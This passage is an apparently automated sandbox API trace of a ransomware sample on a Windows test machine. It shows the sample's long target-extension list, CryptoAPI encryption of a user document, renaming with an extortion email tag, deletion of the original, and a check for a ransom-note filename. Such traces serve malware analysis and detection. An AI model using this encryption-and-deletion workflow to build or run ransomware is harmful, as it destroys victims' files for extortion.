returned=".odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.173] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.173] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.173] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.174] ReadFile (in: hFile=0x2c0, lpBuffer=0xfda128, nNumberOfBytesToRead=0x9e2, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfda128*, lpNumberOfBytesRead=0x18b350*=0x9e2, lpOverlapped=0x0) returned 1
	[0188.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.176] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcbaa0) returned 1
	[0188.178] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.178] CryptCreateHash (in: hProv=0xfcbaa0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.179] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.179] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.179] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.179] CryptDeriveKey (in: hProv=0xfcbaa0, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb90f0) returned 1
	[0188.179] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.179] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x9e2, dwBufLen=0x9e2 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x9f0) returned 1
	[0188.179] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.180] RtlMoveMemory (in: Destination=0xfdb150, Source=0xfda128, Length=0x9e2 | out: Destination=0xfdb150) 
	[0188.180] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.180] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdb150*, pdwDataLen=0x18aefc*=0x9e2, dwBufLen=0x9f0 | out: pbData=0xfdb150*, pdwDataLen=0x18aefc*=0x9f0) returned 1
	[0188.180] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.180] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0188.180] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.180] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0188.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.181] CryptReleaseContext (hProv=0xfcbaa0, dwFlags=0x0) returned 1
	[0188.181] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.181] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.182] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.185] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 107
	[0188.185] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.186] WriteFile (in: hFile=0x388, lpBuffer=0xfdb150*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdb150*, lpNumberOfBytesWritten=0x18b358*=0x9f0, lpOverlapped=0x0) returned 1
	[0188.189] CloseHandle (hObject=0x388) returned 1
	[0188.189] CloseHandle (hObject=0x2c0) returned 1
	[0188.189] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp")) returned 1
	[0188.192] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp")) returned 0
	[0188.192] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda55ea0, ftCreationTime.dwHighDateTime=0x1d96972, ftLastAccessTime.dwLowDateTime=0x25a3a9c0, ftLastAccessTime.dwHighDateTime=0x1d97595, ftLastWriteTime.dwLowDateTime=0x25a3a9c0, ftLastWriteTime.dwHighDateTime=0x1d97595, nFileSizeHigh=0x0, nFileSizeLow=0x7c04, dwReserved0=0x0, dwReserved1=0x0, cFileName="Swx3yPlrAF4ueMXfMVJI.docx", cAlternateFileName="SWX3YP~1.DOC")) returned 1
	[0188.192] lstrcmpW (lpString1="Swx3yPlrAF4ueMXfMVJI.docx", lpString2="..") returned 1
	[0188.192] lstrcmpW (lpString1="Swx3yPlrAF4ueMXfMVJI.docx", lpString2=".") returned 1
	[0188.193] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.193] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="Swx3yPlrAF4ueMXfMVJI.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\Swx3yPlrAF4ueMXfMVJI.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\Swx3yPlrAF4ueMXfMVJI.docx"
	[0188.193] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\Swx3yPlrAF4ueMXfMVJI.docx") returned 77
	[0188.193] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.193] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\Swx3yPlrAF4ueMXfMVJI.docx", cchLength=0x4d | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx") returned 0x4d
	[0188.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.193] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.194] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx"
	[0188.194] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx") returned 77
	[0188.194] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.194] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0188.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.195] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xm